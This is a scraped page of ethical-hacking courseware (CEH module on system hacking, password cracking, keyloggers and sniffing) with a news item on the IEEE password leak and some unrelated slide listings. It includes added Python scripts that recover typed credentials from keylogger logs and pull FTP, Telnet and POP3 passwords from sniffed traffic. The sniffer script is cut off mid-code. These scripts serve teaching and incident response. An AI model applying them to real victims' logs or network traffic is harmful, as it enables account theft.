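The diagram stops at "keylogger sends login credentials to the attacker". What the attacker (or, on the defensive side, an incident responder triaging a recovered keylogger report) actually receives is a raw stream of key events, not a neat user name and password. The following Python is an added example, not part of the CEH courseware, that replays such a stream into the forms the victim submitted and pulls the credentials out of any logon-style window. It does not hook the keyboard itself; the log format (one event per line as timestamp, foreground window title, key name), the window titles, the "<SHIFT_DOWN>"/"<BACKSPACE>"/"<TAB>"/"<ENTER>" key names, and the US-layout shift mapping are all assumptions made for this example. It goes slightly beyond the figure by handling the edge cases a real log contains: corrections with Backspace, shifted characters, focus moving to another window before Enter, and malformed lines.

```python
import re
from dataclasses import dataclass

# Constructed sample of an exfiltrated keylogger report (not a real capture):
# "<timestamp>\t<foreground window>\t<key>", one keystroke per line.
# The victim types user "jdoe", then the password "P4sz" corrected to "P4ss!".
SAMPLE_LOG = """\
2012-09-26 08:01:02\tLog On to Windows\tj
2012-09-26 08:01:02\tLog On to Windows\td
2012-09-26 08:01:03\tLog On to Windows\to
2012-09-26 08:01:03\tLog On to Windows\te
2012-09-26 08:01:03\tLog On to Windows\t<TAB>
2012-09-26 08:01:04\tLog On to Windows\t<SHIFT_DOWN>
2012-09-26 08:01:04\tLog On to Windows\tp
2012-09-26 08:01:04\tLog On to Windows\t<SHIFT_UP>
2012-09-26 08:01:04\tLog On to Windows\t4
2012-09-26 08:01:05\tLog On to Windows\ts
2012-09-26 08:01:05\tLog On to Windows\tz
2012-09-26 08:01:05\tLog On to Windows\t<BACKSPACE>
2012-09-26 08:01:05\tLog On to Windows\ts
2012-09-26 08:01:06\tLog On to Windows\t<SHIFT_DOWN>
2012-09-26 08:01:06\tLog On to Windows\t1
2012-09-26 08:01:06\tLog On to Windows\t<SHIFT_UP>
2012-09-26 08:01:06\tLog On to Windows\t<ENTER>
garbage line without tabs
2012-09-26 08:03:10\tMozilla Firefox\th
2012-09-26 08:03:10\tMozilla Firefox\te
2012-09-26 08:03:11\tMozilla Firefox\tl
2012-09-26 08:03:11\tMozilla Firefox\tl
2012-09-26 08:03:11\tMozilla Firefox\to
2012-09-26 08:03:12\tMozilla Firefox\t<ENTER>
"""

# Assumption: US keyboard layout for the shifted non-letter keys.
SHIFT_MAP = {"1": "!", "2": "@", "3": "#", "4": "$", "5": "%", "6": "^",
             "7": "&", "8": "*", "9": "(", "0": ")", "-": "_", "=": "+"}

# Assumption: window titles that look like logon prompts (domain logon, web sign-in).
LOGON_WINDOWS = re.compile(r"log on|login|sign in", re.IGNORECASE)


@dataclass(frozen=True)
class Submission:
    window: str
    fields: tuple  # text of each field in TAB order, as finally submitted with ENTER


@dataclass(frozen=True)
class Credential:
    window: str
    username: str
    password: str


def parse_events(log_text):
    """Return (window, key) pairs; malformed lines are skipped rather than fatal."""
    events = []
    for line in log_text.splitlines():
        parts = line.split("\t")
        if len(parts) != 3 or not parts[2]:
            continue
        events.append((parts[1], parts[2]))
    return events


def reconstruct(log_text):
    """Replay keystrokes into submitted forms, honouring SHIFT, BACKSPACE, TAB and ENTER."""
    submissions = []
    fields = [[]]           # one character list per form field being typed
    shift = False
    current_window = None
    for window, key in parse_events(log_text):
        if window != current_window:
            # Focus moved to another window: anything half-typed there is abandoned.
            fields, shift, current_window = [[]], False, window
        if key == "<SHIFT_DOWN>":
            shift = True
        elif key == "<SHIFT_UP>":
            shift = False
        elif key == "<BACKSPACE>":
            if fields[-1]:
                fields[-1].pop()
        elif key == "<TAB>":
            fields.append([])
        elif key == "<ENTER>":
            submissions.append(Submission(window, tuple("".join(f) for f in fields)))
            fields = [[]]
        elif len(key) == 1:
            fields[-1].append(SHIFT_MAP.get(key, key.upper()) if shift else key)
        # Any other special key (<CTRL_DOWN>, <F5>, ...) is ignored.
    return submissions


def extract_credentials(log_text):
    """Username/password pairs from forms submitted in logon-style windows."""
    return [Credential(s.window, s.fields[0], s.fields[1])
            for s in reconstruct(log_text)
            if LOGON_WINDOWS.search(s.window) and len(s.fields) >= 2]


if __name__ == "__main__":
    for c in extract_credentials(SAMPLE_LOG):
        print(f"{c.window}: user={c.username!r} password={c.password!r}")
```

Run against the constructed log, the script recovers user "jdoe" with password "P4ss!" from the domain logon window and leaves the Firefox submission ("hello") unflagged. The point for defenders is visible in the code: the Backspace and Shift handling means the attacker gets the password exactly as the victim finally typed it, so password complexity rules are no defence against a keylogger; the controls that matter are keeping the keylogger off the host (endpoint protection, least privilege, application allow-listing) and multi-factor authentication so a captured password is not enough to log on to the domain server.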


TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc
 
[BuildWithAI] Introduction to Gemini.pdf
[BuildWithAI] Introduction to Gemini.pdf[BuildWithAI] Introduction to Gemini.pdf
[BuildWithAI] Introduction to Gemini.pdfSandro Moreira
 
Exploring Multimodal Embeddings with Milvus
Exploring Multimodal Embeddings with MilvusExploring Multimodal Embeddings with Milvus
Exploring Multimodal Embeddings with MilvusZilliz
 
MS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectorsMS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectorsNanddeep Nachan
 
Elevate Developer Efficiency & build GenAI Application with Amazon Q​
Elevate Developer Efficiency & build GenAI Application with Amazon Q​Elevate Developer Efficiency & build GenAI Application with Amazon Q​
Elevate Developer Efficiency & build GenAI Application with Amazon Q​Bhuvaneswari Subramani
 
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdfRising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdfOrbitshub
 
Vector Search -An Introduction in Oracle Database 23ai.pptx
Vector Search -An Introduction in Oracle Database 23ai.pptxVector Search -An Introduction in Oracle Database 23ai.pptx
Vector Search -An Introduction in Oracle Database 23ai.pptxRemote DBA Services
 

Kürzlich hochgeladen (20)

EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWEREMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
 
DBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor PresentationDBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor Presentation
 
Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...
Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...
Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...
 
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
 
DEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 AmsterdamDEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a Fresher
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century education
 
Corporate and higher education May webinar.pptx
Corporate and higher education May webinar.pptxCorporate and higher education May webinar.pptx
Corporate and higher education May webinar.pptx
 
Artificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyArtificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : Uncertainty
 
Architecting Cloud Native Applications
Architecting Cloud Native ApplicationsArchitecting Cloud Native Applications
Architecting Cloud Native Applications
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers:  A Deep Dive into Serverless Spatial Data and FMECloud Frontiers:  A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
 
ICT role in 21st century education and its challenges
ICT role in 21st century education and its challengesICT role in 21st century education and its challenges
ICT role in 21st century education and its challenges
 
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
 
[BuildWithAI] Introduction to Gemini.pdf
[BuildWithAI] Introduction to Gemini.pdf[BuildWithAI] Introduction to Gemini.pdf
[BuildWithAI] Introduction to Gemini.pdf
 
Exploring Multimodal Embeddings with Milvus
Exploring Multimodal Embeddings with MilvusExploring Multimodal Embeddings with Milvus
Exploring Multimodal Embeddings with Milvus
 
MS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectorsMS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectors
 
Elevate Developer Efficiency & build GenAI Application with Amazon Q​
Elevate Developer Efficiency & build GenAI Application with Amazon Q​Elevate Developer Efficiency & build GenAI Application with Amazon Q​
Elevate Developer Efficiency & build GenAI Application with Amazon Q​
 
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdfRising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
 
Vector Search -An Introduction in Oracle Database 23ai.pptx
Vector Search -An Introduction in Oracle Database 23ai.pptxVector Search -An Introduction in Oracle Database 23ai.pptx
Vector Search -An Introduction in Oracle Database 23ai.pptx
 

Ce hv8 module 05 system hacking

IEEE Hack Confirmed, 100k Plain Text Passwords Vulnerable

Source: http://www.kitguru.net

After details were revealed by Radu Dragusin over at IEEElog.com recently that passwords and user details for some 100,000 members of the Institute of Electrical and Electronics Engineers had been made publicly available on the company's FTP server for at least a month, the organization confirmed this in a communication to members, advising them to change their details immediately.
The IEEE is an organization that is designed to advance technology and has over 400,000 members worldwide, many of those including employees at Apple, Google, IBM, Oracle, and Samsung. It is responsible for globally used standards like the IEEE 802.3 Ethernet standard and the IEEE 802.11 Wireless Networking standard. At an organization like this, you'd expect security to be high.

Still, this hack was no hoax. The official announcement of it reads: "IEEE has become aware of an incident regarding inadvertent access to unencrypted log files containing user IDs and passwords. This matter has been addressed and resolved. None of your financial information was made accessible in this situation."

The company continued saying though, that it was technically possible that during the time this information was available, someone could have used it to access a user's account and therefore, as a "precautionary measure," the IEEE recommended all users change their account information. Until that time, users were not able to access their account at all.

In what seems like quite a bold move, the organization went on to explain to users that one of the best ways to protect themselves is to use a strong, unique password for their login. Considering it was an IEEE security blunder that caused the hack, advising other people on password strength seems a bit hypocritical. That said, in Mr Dragusin's reveal of the hacked information, he produced a graph detailing some of the most commonly used passwords. Almost 300 people used "123456" and other variations of numbers in that same configuration, while hundreds of others used passwords like "admin," "student," and "ieee2012." Considering the involvement of IEEE members in pushing the boundaries of current technology, you'd assume we wouldn't need to turn to Eugene "The Plague" Belford to explain the importance of password security.

Copyright © 2010-2013 KitGuru Limited
Author: Jon Martindale
http://www.kitguru.net/channel/jon-martindale/ieee-hack-confirmed-100k-plain-text-passwords-vulnerable/
• 5. Module Objectives

The preceding modules dealt with the progressive intrusion that an attacker makes towards his or her target system(s). You should bear in mind that this does not indicate a culmination of the attack. This module familiarizes you with:

- System Hacking: Goals
- CEH Hacking Methodology (CHM)
- Password Cracking
- Stealing Passwords Using Keyloggers
- Microsoft Authentication
- How to Disable LM HASH
- How to Defend against Password Cracking
- Privilege Escalation
- Executing Applications
- Types of Keystroke Loggers and Spywares
- Anti-Keylogger and Anti-Spywares
- Detecting Rootkits
- Anti-Rootkits
- NTFS Stream Manipulation
- Classification of Steganography
- Steganalysis Methods/Attacks on Steganography
- Covering Tracks
- Penetration Testing
• 6. Information at Hand Before System Hacking Stage

Before beginning with system hacking, let's go over the phases you went through and the information you collected so far. Prior to this module, we discussed:

Footprinting Module

Footprinting is the process of accumulating data regarding a specific network environment. Usually this technique is applied for the purpose of finding ways to intrude into the network environment. Since footprinting can be used to attack a system, it can also be used to protect it. In the footprinting phase, the attacker creates a profile of the target organization, with information such as its IP address range, namespace, and employee web usage. Footprinting improves the ease with which the systems can be exploited by revealing system vulnerabilities. Determining the objective and location of an intrusion is the primary step involved in footprinting. Once the objective and location of an intrusion is known, specific information about the organization can be gathered using non-intrusive methods. For example, the web page of the organization itself may provide employee bios or a personnel directory, which the hacker can use for social engineering to reach the objective. Conducting a Whois query on the web provides the associated networks and domain names related to a specific organization.
• 7. Scanning Module

Scanning is a procedure for identifying active hosts on a network, either for the purpose of network security assessment or for attacking them. In the scanning phase, the attacker finds information about the target assessment through its IP addresses that can be accessed over the Internet. Scanning is mainly concerned with the identification of systems on a network and the identification of services running on each computer. Some of the scanning procedures, such as port scans and ping sweeps, return information about the services offered by the live hosts that are active on the Internet and their IP addresses. The inverse mapping scanning procedure returns information about the IP addresses that do not map to live hosts; this allows an attacker to make suppositions about feasible addresses.

Enumeration Module

Enumeration is the method of intrusive probing into the target assessment through which attackers gather information such as network user lists, routing tables, and Simple Network Management Protocol (SNMP) data. This is significant because the attacker crosses over the target territory to unearth information about the network, and shares, users, groups, applications, and banners. The attacker's objective is to identify valid user accounts or groups where he or she can remain inconspicuous once the system has been compromised. Enumeration involves making active connections to the target system or subjecting it to direct queries. Normally, an alert and secure system will log such attempts. Often the information gathered is what the target might have made public, such as a DNS address; however, it is possible that the attacker stumbles upon a remote IPC share, such as IPC$ in Windows, that can be probed with a null session, allowing shares and accounts to be enumerated.
• 8. System Hacking: Goals

Every criminal commits a crime to achieve a certain goal. Likewise, an attacker can also have certain goals behind performing attacks on a system. The following may be some of the goals of attackers in committing attacks on a system. The table shows the goal of an attacker at different hacking stages and the technique used to achieve that goal.

Hacking Stage          | Goal                                                              | Technique/Exploit Used
Gaining Access         | To collect enough information to gain access                      | Password eavesdropping, brute forcing
Escalating Privileges  | To create a privileged user account if the user level is obtained | Password cracking, known exploits
Executing Applications | To create and maintain backdoor access                            | Trojans
Hiding Files           | To hide malicious files                                           | Rootkits
Covering Tracks        | To hide the presence of compromise                                | Clearing logs

FIGURE 5.1: Goals for System Hacking
• 10. CEH Hacking Methodology (CHM)

Before hacking a system, an attacker uses footprinting, scanning, and enumeration techniques to detect the target area of the attack and the vulnerabilities that prove to be doorways for the attacker. Once the attacker gains all the necessary information, he or she starts hacking. Similar to the attacker, an ethical hacker also follows the same steps to test a system or network. In order to ensure the effectiveness of the test, the ethical hacker follows the hacking methodology. The following diagram depicts the hacking methodology followed by ethical hackers:

FIGURE 5.2: CEH Hacking Methodology (CHM)
• 12. CEH System Hacking Steps

System hacking cannot be accomplished in a single go. It is accomplished through various steps that include cracking passwords, escalating privileges, executing applications, hiding files, covering tracks, and finally penetration testing. Now it's time to discuss these steps one by one thoroughly, to determine how the attacker hacks the system. In an attempt to hack a system, the attacker first tries to crack passwords. This section describes the first step, i.e., password cracking, and will tell you how and what types of different tools and techniques an attacker uses to crack the password of the target system.

- Cracking Passwords
- Escalating Privileges
- Executing Applications
- Hiding Files
- Covering Tracks
- Penetration Testing
• 13. Password Cracking

Password cracking is the process of recovering passwords from data that has been transmitted by a computer system or stored in it. The purpose of password cracking might be to help a user recover a forgotten or lost password, as a preventive measure by system administrators to check for easily crackable passwords, or to gain unauthorized access to a system. Many hacking attempts start with password cracking attempts. Passwords are the key piece of information necessary to access a system. Consequently, most attackers use password cracking techniques to gain unauthorized access to the vulnerable system. Passwords may be cracked manually or with automated tools such as a dictionary or brute-force method. Programs designed for cracking passwords are rated by the number of candidate passwords per second they can check. Often users, while creating passwords, select passwords that are predisposed to being cracked, such as using a pet's name or choosing one that's simple so they can remember it. Most password cracking techniques are successful due to weak or easily guessable passwords.
• 14. Password Complexity

Password complexity plays a key role in improving security against attacks. It is the important element that users should ensure while creating a password. The password should not be simple, since simple passwords are prone to attacks. The passwords that you choose should always be complex, long, and difficult to remember. The password that you are setting for your account must meet the complexity requirements policy setting. Password characters should be a combination of alphanumeric characters. Alphanumeric characters consist of letters, numbers, punctuation marks, and mathematical and other conventional symbols. The following list shows the character mix each category refers to:

- Passwords that contain letters, special characters, and numbers: apl@52
- Passwords that contain only numbers: 23698217
- Passwords that contain only special characters: &*#@!(%)
- Passwords that contain letters and numbers: meet123
- Passwords that contain only letters: POTHMYDE
- Passwords that contain only letters and special characters: bob@&ba
- Passwords that contain only special characters and numbers: 123@$45
• 15. Password Cracking Techniques

Password cracking is the technique used for discovering passwords. It is the classic way to gain privileges to a computer system or network. The common approach for cracking a password is to continually try guesses for the password with various combinations until you get the correct one. There are five techniques for password cracking, as follows:

- Dictionary Attack: A dictionary file is loaded into the cracking application that runs against user accounts
- Brute Forcing Attack: The program tries every combination of characters until the password is broken
- Hybrid Attack: It works like a dictionary attack, but adds some numbers and symbols to the words from the dictionary and tries to crack the password
- Syllable Attack: It is the combination of both a brute force attack and the dictionary attack
- Rule-based Attack: This attack is used when the attacker gets some information about the password

Dictionary Attacks

In a dictionary attack, a dictionary file is loaded into the cracking application that runs against user accounts. This dictionary is a text file that contains a number of dictionary words. The program uses every word present in the dictionary to find the password. Dictionary attacks are more useful than brute force attacks, but this attack does not work with a system that uses passphrases. This attack can be applied under two situations:

- In cryptanalysis, it is used to find out the decryption key for obtaining plaintext from ciphertext.
- In computer security, to bypass authentication and access the computer by guessing passwords.
• 16. Methods to improve the success of a dictionary attack:

- Use a number of dictionaries, such as technical dictionaries and foreign dictionaries, which helps to retrieve the correct password
- Use string manipulation on the dictionary; for example, if the dictionary contains the word "system," then also try manipulated forms such as "metsys"

Brute Forcing Attacks

Cryptographic algorithms must be sufficiently hardened in order to prevent a brute-force attack. The definition as stated by RSA: "Exhaustive key-search, or brute-force search, is the basic technique for trying every possible key in turn until the correct key is identified." When someone tries to produce each and every single encryption key for data until the needed information is detected, this is termed a brute force attack. To date, this type of attack has been performed by those who had sufficient processing power. The United States government once believed (in 1977) that a 56-bit Data Encryption Standard (DES) was sufficient to deter all brute-force attacks, a claim that several groups across the world had tested.

Cryptanalysis by brute force is an exhaustive search of the keyspace: in other words, all possible keys are tested in an attempt to recover the plaintext used to produce a particular ciphertext. Any method that detects the key or plaintext faster than brute force can be considered a way of breaking the cipher. A cipher is secure if no method exists to break that cipher other than the brute force attack. Most ciphers lack a mathematical proof of security. If the keys are originally chosen randomly or searched randomly, the plaintext will, on average, become available after half of all the possible keys are tried.

Some of the considerations for brute-force attacks are as follows:

- It is a time-consuming process
- All passwords will eventually be found
- Attacks against NT hashes are much more difficult than LM hashes

Hybrid Attack

This type of attack depends upon the dictionary attack. There are chances that people might change their password by just adding some numbers to their old password. In this type of attack, the program adds some numbers and symbols to the words from the dictionary and tries to crack the password. For example, if the old password is "system," then there is a chance that the person will change it to "system1" or "system2."
• 17. Syllable Attack

A syllable attack is the combination of both a brute force attack and the dictionary attack. This cracking technique is used when the password is not an existing word. Attackers use the dictionary and other methods to crack it. It also uses the possible combination of every word present in the dictionary.

Rule-based Attack

This type of attack is used when the attacker gets some information about the password. This is the most powerful attack because the cracker knows the type of password. For example, if the attacker knows that the password contains a two- or three-digit number, then he or she will use some specific techniques and extract the password in less time. By obtaining useful information such as use of numbers, the length of password, and special characters, the attacker can easily adjust the time for retrieving the password to the minimum and enhance the cracking tool to retrieve passwords. This technique involves brute force, dictionary, and syllable attacks.
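The complexity categories and the dictionary, hybrid, string-manipulation and brute-force techniques above describe what a weak password exposes; as an added example (not part of the CEH module), the following Python policy check screens a proposed password from the defender's side: it flags which dictionary-style technique would recover it, and turns the half-keyspace rule into an expected brute-force time. The wordlist, character-class sizes, length/class thresholds and guess rate are constructed assumptions, not figures from the page.

```python
"""Added example (not part of the CEH module): defender-side password policy
check modelled on the cracking techniques in this section. COMMON_WORDS,
CLASS_SIZES, the thresholds and the guess rate are assumed values."""
import re
from typing import Dict, List, Optional, Set

# Constructed stand-in for a cracking dictionary (includes the passwords the
# IEEE story above names); a real check would load large wordlists, including
# the technical and foreign dictionaries the text recommends.
COMMON_WORDS = {
    "password", "system", "admin", "student", "ieee2012",
    "123456", "qwerty", "letmein", "welcome",
}

# Size of each character class a brute-force alphabet must cover once the
# attacker knows (or assumes) the password uses it. Assumed values.
CLASS_SIZES = {"lower": 26, "upper": 26, "digit": 10, "special": 32}


def char_classes(password: str) -> Set[str]:
    """Return the set of character classes present in the password."""
    classes = set()
    for ch in password:
        if ch.islower():
            classes.add("lower")
        elif ch.isupper():
            classes.add("upper")
        elif ch.isdigit():
            classes.add("digit")
        else:
            classes.add("special")
    return classes


def brute_force_keyspace(password: str) -> int:
    """Candidates a brute-force attack must cover for this length, drawn from
    the character classes the password actually uses (alphabet ** length)."""
    alphabet = sum(CLASS_SIZES[c] for c in char_classes(password))
    return alphabet ** len(password)


def expected_brute_force_seconds(password: str, guesses_per_second: float) -> float:
    """Expected time to hit a randomly chosen password: on average half of
    the keyspace is tried before the right candidate turns up."""
    return brute_force_keyspace(password) / 2 / guesses_per_second


def hybrid_stem(password: str) -> str:
    """Strip the digits/symbols a hybrid attack bolts onto a dictionary word,
    so that 'system1' and 'System2!' both reduce to 'system'."""
    return re.sub(r"^[\d\W_]+|[\d\W_]+$", "", password.lower())


def dictionary_exposure(password: str) -> Optional[str]:
    """Name the dictionary-style technique that would recover the password:
    'dictionary' (word as-is), 'hybrid' (word plus digits/symbols),
    'reversed' (string manipulation such as 'metsys'), or None."""
    lowered = password.lower()
    stem = hybrid_stem(password)
    if lowered in COMMON_WORDS:
        return "dictionary"
    if stem and stem in COMMON_WORDS:
        return "hybrid"
    if lowered[::-1] in COMMON_WORDS or stem[::-1] in COMMON_WORDS:
        return "reversed"
    return None


def assess_password(password: str, guesses_per_second: float = 1e9,
                    min_length: int = 8, min_classes: int = 3) -> Dict:
    """Apply the complexity policy and report which attack would defeat a
    password that fails it. Thresholds and rate are assumed defaults."""
    classes = char_classes(password)
    problems: List[str] = []
    exposure = dictionary_exposure(password)
    if exposure:
        problems.append(f"recoverable by {exposure} attack")
    if len(password) < min_length:
        problems.append(f"shorter than {min_length} characters")
    if len(classes) < min_classes:
        problems.append(f"uses {len(classes)} character class(es), need {min_classes}")
    return {
        "classes": sorted(classes),
        "keyspace": brute_force_keyspace(password),
        "expected_seconds": expected_brute_force_seconds(password, guesses_per_second),
        "problems": problems,
        "accepted": not problems,
    }


if __name__ == "__main__":
    # The page's own samples: IEEE leak favourites and the complexity table.
    for pw in ["123456", "ieee2012", "system1", "metsys", "POTHMYDE",
               "bob@&ba", "apl@52", "Mz!7qLp2wX"]:
        report = assess_password(pw)
        verdict = "OK " if report["accepted"] else "BAD"
        print(f"{pw:12} {verdict} ~{report['expected_seconds']:.3g}s brute force "
              f"{report['problems']}")
```

Note that the keyspace estimate is only the attacker's worst case: a password that a dictionary, hybrid or reversal check catches falls in seconds regardless of the length-based figure, which is why the policy rejects it first.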
Types of Password Attacks

1. Passive Online Attacks: the attacker cracks passwords without communicating with the authorizing party.
   - Wire Sniffing
   - Man-in-the-Middle
   - Replay
2. Active Online Attacks: the attacker tries candidate passwords one by one against the victim system.
   - Password Guessing
   - Trojan/Spyware/Keyloggers
   - Hash Injection
   - Phishing
3. Offline Attacks: the attacker copies the target's password file and then cracks the passwords on his or her own system at a different location.
   - Pre-Computed Hashes
   - Distributed Network
   - Rainbow
4. Non-Electronic Attacks: the attacker needs no technical knowledge to obtain the password, hence these are also known as non-technical attacks.
   - Shoulder Surfing
   - Social Engineering
   - Dumpster Diving

Password cracking is one of the crucial stages of hacking a system. Used for legitimate purposes, password cracking recovers a user's forgotten password; used by illegitimate users, it gives them unauthorized privileges on the network or system. Password attacks are classified by the actions the attacker takes to crack a password. There are usually four types, described below.

Passive Online Attacks

A passive attack is an attack on a system that does not change the system in any way; the attacker purely monitors or records data.
A passive attack on a cryptosystem is one in which the cryptanalyst cannot interact with any of the parties involved and attempts to break the system solely on the basis of observed data. There are three types of passive online attacks:
- Wire sniffing
- Man-in-the-middle
- Replay
Active Online Attacks

An active online attack is the easiest way to gain unauthorized administrator-level access to a system. There are four types of active online attacks:
- Password guessing
- Trojan/spyware/keylogger
- Hash injection
- Phishing

Offline Attacks

Offline attacks occur when the intruder has obtained a copy of the stored passwords and checks candidate passwords against it without touching the target system. He or she first observes how the passwords are stored on the target. If the usernames and passwords are kept in a readable file, it becomes trivial for the intruder to gain access to the system. A password list must therefore never be stored in a readable form: passwords should be stored only as salted hashes, never as plaintext. Offline attacks are often time consuming. They are successful against LM hashes because the LM scheme has a small keyspace and a short effective length.

Considerations and countermeasures for offline attacks:
- The attacker already has the password database, so account lockouts and rate limits no longer help.
- Use good passwords.
- Remove LM hashes.
- Use cryptographically secure methods when representing the passwords.

Different password cracking techniques are available on the Internet. There are three types of offline attacks.
They are:
- Pre-computed hashes
- Distributed network
- Rainbow

Non-Electronic Attacks

Non-electronic attacks are also known as non-technical attacks. This kind of attack does not require any technical knowledge about how to intrude into another person's system, which is why it is called a non-electronic attack. There are three types of non-electronic attacks:
- Shoulder surfing
- Social engineering
- Dumpster diving
Passive Online Attack: Wire Sniffing

Attackers run packet sniffer tools on the local area network (LAN) to access and record the raw network traffic. The captured data may include sensitive information such as passwords (Telnet, FTP, rlogin sessions, etc.) and emails. Sniffed credentials are used to gain unauthorized access to the target system.

A packet sniffer can only capture traffic that reaches its own network interface, which limits where this attack works. Sniffers collect frames at the Data Link Layer, so they can grab every frame delivered to the segment of the machine running the sniffer. On a shared medium such as a hub, every frame sent across the LAN is delivered to each and every machine connected to it, so an attacker running a sniffer on one system can gather the data sent to and from any other system on that LAN. On a switched or bridged segment the attacker's port receives only traffic addressed to it (plus broadcasts), so the method is relatively hard to perpetrate on modern networks and is considered computationally complex.
The majority of sniffer tools are ideally suited to capturing data in a hub environment. These tools are called passive sniffers because they passively wait for data to be sent and then capture it; they are efficient at gathering data from the LAN imperceptibly. The captured data may include passwords sent to remote systems during Telnet, FTP, and rlogin sessions, and electronic mail sent and received. Sniffed credentials are used to gain unauthorized access to the target system. A variety of tools for passive wire sniffing are available on the Internet.
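What a sniffer actually harvests from Telnet, FTP and POP3 sessions is shown by the following added example, which is not code from the courseware or from any sniffer product. The packet list is a constructed capture using documentation-range addresses; a real tool would read the same five fields from a pcap. The example reassembles each client-to-server stream (Telnet sends one keystroke per segment) and pairs Telnet answers with the server's login/password prompts.

```python
"""Recover cleartext credentials from sniffed traffic.

Added example, not from the CEH courseware.  CAPTURE is a constructed packet
list with documentation-range addresses; a real tool would take the same
five fields from a pcap.  It reassembles each client->server stream and
pulls out FTP/POP3 USER/PASS commands and Telnet login/password answers,
which is exactly what a passive sniffer on a hub segment would harvest.
"""
import re
from collections import defaultdict

# (src_ip, src_port, dst_ip, dst_port, payload) -- constructed traffic
CAPTURE = [
    # FTP: client sends USER/PASS as whole lines
    ("10.0.0.5", 51000, "10.0.0.20", 21, b"USER alice\r\n"),
    ("10.0.0.20", 21, "10.0.0.5", 51000, b"331 Please specify the password.\r\n"),
    ("10.0.0.5", 51000, "10.0.0.20", 21, b"PASS Wint3r2012!\r\n"),
    # POP3: same command names, different port
    ("10.0.0.7", 52000, "10.0.0.21", 110, b"USER bob@example.test\r\n"),
    ("10.0.0.7", 52000, "10.0.0.21", 110, b"PASS hunter2\r\n"),
    # Telnet: server prompts, client sends one keystroke per segment
    ("10.0.0.20", 23, "10.0.0.9", 53000, b"login: "),
    ("10.0.0.9", 53000, "10.0.0.20", 23, b"r"),
    ("10.0.0.9", 53000, "10.0.0.20", 23, b"o"),
    ("10.0.0.9", 53000, "10.0.0.20", 23, b"o"),
    ("10.0.0.9", 53000, "10.0.0.20", 23, b"t"),
    ("10.0.0.9", 53000, "10.0.0.20", 23, b"\r\n"),
    ("10.0.0.20", 23, "10.0.0.9", 53000, b"Password: "),
    ("10.0.0.9", 53000, "10.0.0.20", 23, b"t"),
    ("10.0.0.9", 53000, "10.0.0.20", 23, b"0"),
    ("10.0.0.9", 53000, "10.0.0.20", 23, b"o"),
    ("10.0.0.9", 53000, "10.0.0.20", 23, b"r"),
    ("10.0.0.9", 53000, "10.0.0.20", 23, b"\r\n"),
]

CLEARTEXT_PORTS = {21: "ftp", 23: "telnet", 110: "pop3"}
USER_PASS_RE = re.compile(rb"^(USER|PASS) (.+)$", re.IGNORECASE)


def flow_key(src, sport, dst, dport):
    """(client_ip, client_port, server_ip, server_port) for either direction."""
    if dport in CLEARTEXT_PORTS:
        return (src, sport, dst, dport)
    return (dst, dport, src, sport)


def handle_client_line(service, server, line, st, creds):
    """Interpret one complete client line according to the protocol."""
    if service in ("ftp", "pop3"):
        m = USER_PASS_RE.match(line)
        if not m:
            return
        cmd, arg = m.group(1).upper(), m.group(2).decode(errors="replace")
        if cmd == b"USER":
            st["user"] = arg
        elif st["user"] is not None:           # PASS following a USER
            creds.append((service, server, st["user"], arg))
            st["user"] = None
    elif service == "telnet":
        text = line.decode(errors="replace")
        if st["expect"] == "user":
            st["user"] = text
        elif st["expect"] == "pass" and st["user"] is not None:
            creds.append((service, server, st["user"], text))
            st["user"] = None
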